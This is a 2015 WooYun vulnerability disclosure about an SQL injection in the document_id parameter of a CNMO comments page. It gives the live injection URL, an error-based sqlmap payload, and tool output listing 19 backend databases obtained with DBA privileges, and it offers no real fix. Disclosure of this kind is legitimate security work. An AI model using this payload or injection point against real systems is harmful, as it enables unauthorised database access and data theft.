当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0144081

漏洞标题:手机中国某站存在注入涉及19个数据库(DBA权限)

相关厂商:手机中国

漏洞作者: 路人甲

提交时间:2015-09-29 16:11

修复时间:2015-11-14 11:44

公开时间:2015-11-14 11:44

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-29: 细节已通知厂商并且等待厂商处理中
2015-09-30: 厂商已经确认,细节仅向厂商公开
2015-10-10: 细节向核心白帽子及相关领域专家公开
2015-10-20: 细节向普通白帽子公开
2015-10-30: 细节向实习白帽子公开
2015-11-14: 细节向公众公开

简要描述:

关于CNMO
手机中国网(CNMO.COM)成立于2007年9月,立足手机高端专业内容的建设,拥有20多个专业频道,100余个子频道,每天提供超过1200余部手机最新市场信息,每天有上千家的经销商利用手机中国的平台与用户交流商讯。手机中国网为客户提供资讯、互动、营销三位一体的网络整合行销服务。
能找到个注入点真不容易!

详细说明:

注入点:
http://comments.cnmo.com/doc_vote2010.php?document_id=
注入参数 document_id

cnmo-注入点.jpg


GET parameter 'document_id' is vulnerable. Do you want to keep testing the other
s (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 2105 HTTP(s)
requests:
---
Parameter: document_id (GET)
    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause
    Payload: document_id=-5706 OR 1 GROUP BY CONCAT(0x716a627871,(SELECT (CASE W
HEN (3039=3039) THEN 1 ELSE 0 END)),0x7176767071,FLOOR(RAND(0)*2)) HAVING MIN(0)
#
---
[15:43:15] [INFO] testing MySQL
[15:43:24] [INFO] confirming MySQL
[15:43:24] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
[15:43:24] [INFO] fetching database names
[15:43:25] [INFO] the SQL query used returns 19 entries
[15:43:25] [INFO] retrieved: information_schema
[15:43:25] [INFO] retrieved: cnmo_active
[15:43:25] [INFO] retrieved: cnmo_dealer
[15:43:25] [INFO] retrieved: cnmo_dealer_counter
[15:43:25] [INFO] retrieved: cnmo_mall
[15:43:26] [INFO] retrieved: cnmo_new_stats
[15:43:26] [INFO] retrieved: cnmo_picture
[15:43:26] [INFO] retrieved: cnmo_product
[15:43:26] [INFO] retrieved: cnmo_s
[15:43:26] [INFO] retrieved: cnmo_stat_hits
[15:43:26] [INFO] retrieved: cnmo_tihuobao
[15:43:27] [INFO] retrieved: cnmo_zoldb
[15:43:27] [INFO] retrieved: mysql
[15:43:27] [INFO] retrieved: new_article
[15:43:27] [INFO] retrieved: new_comment
[15:43:27] [INFO] retrieved: new_plugin
[15:43:57] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is
 going to retry the request
[15:44:31] [INFO] retrieved: new_power
[15:44:31] [INFO] retrieved: substation_admin_power
[15:44:31] [INFO] retrieved: test
available databases [19]:
[*] cnmo_active
[*] cnmo_dealer
[*] cnmo_dealer_counter
[*] cnmo_mall
[*] cnmo_new_stats
[*] cnmo_picture
[*] cnmo_product
[*] cnmo_s
[*] cnmo_stat_hits
[*] cnmo_tihuobao
[*] cnmo_zoldb
[*] information_schema
[*] mysql
[*] new_article
[*] new_comment
[*] new_plugin
[*] new_power
[*] substation_admin_power
[*] test


漏洞证明:

涉及19个数据库:

cnmo-数据库.jpg


而且是DBA权限:

cnmo-dba.jpg


部分数据库信息:

cnmo-active库.jpg


cnmo-zoldb库.jpg


修复方案:

这么多库 求20rank! 谢谢

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-09-30 11:43

厂商回复:

感谢找出该漏洞,马上解决

最新状态:

暂无